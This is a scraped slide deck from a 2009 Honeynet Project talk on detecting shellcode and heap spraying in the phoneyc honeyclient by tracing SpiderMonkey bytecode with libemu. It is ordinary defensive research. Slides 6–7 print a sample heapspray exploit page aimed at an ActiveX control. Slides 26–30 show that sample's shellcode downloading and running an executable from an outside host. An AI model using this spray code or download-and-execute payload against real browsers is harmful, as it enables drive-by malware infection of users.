Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 

Dernier (20)

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 

Shellcode and heapspray detection in phoneyc

  • 1. phoneyc with libemu Z. Chen phoneyc WB Malware . . Libemu Shellcode and heapspray detection in phoneyc Tracing JS . .. . . Basic Principles SCDetection Basic Idea Details Zhijie Chen1 Source Files Implementation 1 Honeynet Project Chinese Chapter HS Detection Current Results Honeynet Project on Google Summer of Code, 2009 JoYAN . . . . . .
  • 2. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 2
  • 3. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 3
  • 4. Introduction to phoneyc phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS http://code.google.com/p/phoneyc/ Basic Principles SCDetection A python honeyclient Basic Idea Details Original written by Jose Nazario. Source Files Implementation To detect Web-based Malware HS Detection Current Results JoYAN 4
  • 5. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 5
  • 6. A Typical Heapspray Mal-javascript I phoneyc with libemu 1 <body> Z. Chen <script>window.onerror=function(){return true;}</script> phoneyc <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style=’display:none’ id=’target’></object> WB Malware <SCRIPT language="javascript"> Libemu 6 var shellcode = unescape("%u9090"+"%u9090"+ Tracing JS ...(shellcode) Basic Principles "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672 SCDetection Basic Idea %u7265%u652e%u6578%u0000"); Details </script> Source Files Implementation <SCRIPT language="javascript"> HS Detection 11 var bigblock = unescape("%u9090%u9090"); Current var headersize = 20; Results var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); 16 block = bigblock.substring(0, bigblock.length−slackspace); while(block.length+slackspace<0x40000) JoYAN block = block+block+fillblock; 6
  • 7. A Typical Heapspray Mal-javascript II phoneyc with libemu memory = new Array(); Z. Chen for (x=0; x<100; x++) memory[x] = block +shellcode; 21 var buffer = ’’; phoneyc while (buffer.length < 1024) buffer+="x05"; WB Malware var ok="1111"; Libemu target.Register(ok,buffer); Tracing JS </script> Basic Principles 26 </body> SCDetection Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 7
  • 8. Heap Status After Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles | More than ??MB 0x90(NOP)s or some other x86 instructions SCDetection Basic Idea as a sledge | Shellcode | Details Source Files Implementation HS Detection Current Results JoYAN 8
  • 9. Detecting Shellcode/Heapspray phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Tool: How To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 9
  • 10. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 10
  • 11. Introduction to libemu phoneyc with libemu Z. Chen . phoneyc From it’s official site: . WB Malware .. libemu is a small library written in c offering basic x86 Libemu emulation and shellcode detection using GetPC heuristics. Tracing JS Basic Principles Using libemu one can: SCDetection Basic Idea detect shellcodes Details Source Files execute the shellcodes Implementation HS Detection . profile shellcode behaviour .. . . Current Results Using libemu to detect shellcode and heapspray in web-based malware: ¡¡Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks¿¿) JoYAN 11
  • 12. Detecting x86 Instructions phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS Basic Principles SCDetection SC/HS Detecting Time: When To Detect It? Basic Idea Details Source Files Implementation HS Detection Current Results JoYAN 12
  • 13. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 13
  • 14. Introduction to spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS What is SpiderMonkey? . Basic Principles .. SCDetection SpiderMonkey is the code-name for the Mozilla’s C Basic Idea Details implementation of Source Files Implementation JavaScript.(http://www.mozilla.org/js/spidermonkey/) . .. . . HS Detection Current Results JoYAN 14
  • 15. Basic Principles of Spidermonkey phoneyc with libemu Z. Chen phoneyc WB Malware Libemu All the javascript sources are compiled into js bytecodes. Tracing JS Basic Principles There is an interpreter who interprets the bytecodes and SCDetection Basic Idea do certain simple actions. Details Source Files All the javascript variables are stored as jsval. Implementation HS Detection Some of the values are store as an “atom”, such as strings. Current Results JoYAN 15
  • 16. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 16
  • 17. Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS As both the shellcode manipulation and the spraying of the Basic Principles fillblock involve assignments. The shellcode will be detected SCDetection Basic Idea immediately on it’s assignment if we are able to interrupt Details Source Files spidermonkey at the interpretion of certain bytecodes related to Implementation an assignment and check its argments and values for shellcodes. HS Detection Current Results JoYAN 17
  • 18. Details I phoneyc with libemu Z. Chen The following js codes: phoneyc function a(){b="c"; var a = 0;} WB Malware Libemu are compiled into bytecodes like: Tracing JS Basic Principles 00000: bindname "b" SCDetection 00003: string "c" Basic Idea 00006: setname "b" Details Source Files 4 00009: pop Implementation 00010: zero HS Detection 00011: setvar 0 Current 00014: pop Results 00015: stop So, if we examine the set* opcodes’ arguments on the top of the stack in runtime, shellcodes won’t get passed! JoYAN 18
  • 19. Details phoneyc with libemu Z. Chen phoneyc To do so, we need to: WB Malware Libemu Step trace the spidermonkey runtime. Tracing JS Stop at the key bytecodes (such as setname, setvar, Basic Principles SCDetection setprop, setarg etc.) on all kinds of Basic Idea Details assignments.Unfortunately different assignments have Source Files Implementation different bytecode accordingly. HS Detection But all the opcodes related to assignments share a Current JOF SET bit in their opcode description Results structure(./src/jsopcode.h). JoYAN 19
  • 20. Related Source files to be used later phoneyc with libemu Z. Chen phoneyc WB Malware Libemu jsapi.h:Basic APIs for javascript execution. Tracing JS Basic Principles jsdbgapi.h:Basic APIs for debugging spidermonkey. SCDetection Basic Idea jsopcode.tbl:All the js opcodes(bytecodes). Details Source Files Implementation jsinterp.c:You can find how each bytecode is interpreted HS Detection here. Current Results JoYAN 20
  • 21. Implementation phoneyc with libemu Z. Chen Register a trace handler into spidermonkey using phoneyc JS SetInterrupt. This handler will be called at each step WB Malware of the bytecode execution. Libemu In the handler: Tracing JS Use JS GetTrapOpcode to get current Basic Principles opcode(bytecode). SCDetection Basic Idea Use JS FrameIterator to get current runtime stack. Details Check the rvalue of the set* bytecodes on the top of the Source Files Implementation stack with libemu. HS Detection Dump the shellcodes and alert. Current Contine the execution. Results Privide this traced js virtual as a python module named honeyjs, so other part of phoneyc can use this module just the same as python-spidermonkey with optional awareness of the extra shellcode/heapspray detection APIs. JoYAN 21
  • 22. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 22
  • 23. Basic Idea phoneyc with libemu Z. Chen phoneyc WB Malware Libemu . Tracing JS Heapspray . Basic Principles .. A myriad of NOP-like x86 instructions SCDetection Basic Idea Details Accumulating through a loop of assignments Source Files Implementation . Shellcode in the end of each sledge .. . . HS Detection Current Results JoYAN 23
  • 24. Basic Idea phoneyc with libemu Z. Chen phoneyc . Heapspray . WB Malware .. Libemu A myriad of NOP-like x86 instructions Tracing JS Accumulating through a loop of assignments Basic Principles SCDetection . Shellcode in the end of each sledge .. . . Basic Idea Details Source Files . Implementation Detection . .. HS Detection Now: A variable counter to record the mal-assignments Current Results (assignments containing shellcode in the r-value). . In the future: entropy ? the nozzle way? .. . . JoYAN 24
  • 25. Contents phoneyc with libemu . Z. Chen .. 1 Introduction to phoneyc . phoneyc .. 2 A Typical Web-Based Malware WB Malware . Libemu .. 3 Shellcode detection using Libemu . Tracing JS Basic Principles .. 4 Tracing Mozilla Spidermonkey SCDetection Basic Principles of Spidermonkey Basic Idea . Details Source Files . . Shellcode Detection in phoneyc 5 Implementation Basic Idea HS Detection Details Current Results Related Source files Implementation . . . Heapspray Detection 6 . . . Current Results JoYAN 7 25
  • 26. A Run on ssreader 0day.html I phoneyc with libemu joyan@Jdeb:˜/code/phoneyc$ sh go.sh Z. Chen 2 HONEYCLIENT MODULE TEST fetching http://172.31.25.227/phoneyc/ssreader 0day.html phoneyc [] WB Malware ==> http://172.31.25.227/phoneyc/ssreader 0day.html Libemu JS EVAL Tracing JS 7 Executing Javascript: Basic Principles DEBUG: !!!SC DETECTED at 141847268=141847572size:374 SCDetection DEBUG: !!!SC DETECTED at 141847524=141847756size:32728 Basic Idea Details DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 Source Files Implementation DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 HS Detection 12 ... Current Results DEBUG: !!!SC DETECTED at 141723488=141847756size:32728 SSReader Pdg2 Register method overflow 17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1 Runing shellcode... offset:248 JoYAN DEBUG: Begin analyzing ... DEBUG: download http://1v1.name/server.exe −> 26
  • 27. A Run on ssreader 0day.html II phoneyc with libemu Z. Chen c:WINDOWSsystem32a.exe phoneyc 22 WB Malware ... Libemu Tracing JS URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server. Basic Principles exe’] SCDetection Done Basic Idea Details 27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1 Source Files [ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT: Implementation 100 HS Detection VBS EVAL IFRAMES [] Current Results HREFS [] FRAMES [] 32 IMAGES [] JoYAN 27
  • 28. Analysis of The Shellcode using libemu I phoneyc with libemu FARPROC WINAPI GetProcAddress ( Z. Chen HMODULE hModule = 0x7c800000 => 3 none; phoneyc LPCSTR lpProcName = 0x0041710c => WB Malware = "GetSystemDirectoryA"; Libemu ) = 0x7c814eea; Tracing JS FARPROC WINAPI GetProcAddress ( Basic Principles 8 HMODULE hModule = 0x7c800000 => SCDetection none; Basic Idea Details LPCSTR lpProcName = 0x00417120 => Source Files Implementation = "WinExec"; HS Detection ) = 0x7c86136d; Current 13 FARPROC WINAPI GetProcAddress ( Results HMODULE hModule = 0x7c800000 => none; LPCSTR lpProcName = 0x00417128 => = "ExitThread"; 18 ) = 0x7c80c058; JoYAN FARPROC WINAPI GetProcAddress ( HMODULE hModule = 0x7c800000 => 28
  • 29. Analysis of The Shellcode using libemu II phoneyc with libemu none; Z. Chen LPCSTR lpProcName = 0x00417133 => 23 = "LoadLibraryA"; phoneyc ) = 0x7c801d77; WB Malware HMODULE LoadLibraryA ( Libemu LPCTSTR lpFileName = 0x00417140 => Tracing JS = "urlmon"; Basic Principles 28 ) = 0x7df20000; SCDetection FARPROC WINAPI GetProcAddress ( Basic Idea Details HMODULE hModule = 0x7df20000 => Source Files none; Implementation LPCSTR lpProcName = 0x00417147 => HS Detection 33 = "URLDownloadToFileA"; Current ) = 0x7df7b0bb; Results UINT GetSystemDirectory ( LPTSTR lpBuffer = 0x0012fe5f => none; 38 UINT uSize = 32; ) = 19; JoYAN HRESULT URLDownloadToFile ( 29
  • 30. Analysis of The Shellcode using libemu III phoneyc with libemu Z. Chen LPUNKNOWN pCaller = 0x00000000 => phoneyc none; WB Malware 43 LPCTSTR szURL = 0x0041715a => Libemu = "http://1v1.name/server.exe"; Tracing JS LPCTSTR szFileName = 0x0012fe5f => Basic Principles = "c:WINDOWSsystem32a.exe"; SCDetection DWORD dwReserved = 0; Basic Idea Details 48 LPBINDSTATUSCALLBACK lpfnCB = 0; Source Files ) = 0; Implementation UINT WINAPI WinExec ( HS Detection LPCSTR lpCmdLine = 0x0012fe58 => Current Results = "cmd /c c:WINDOWSsystem32a.exe"; 53 UINT uCmdShow = 0; ) = 32; JoYAN 30
  • 31. phoneyc with libemu Z. Chen phoneyc WB Malware Libemu Tracing JS . Thank you! . Basic Principles SCDetection Basic Idea Details .. .. . . Source Files Implementation HS Detection Current Results JoYAN 31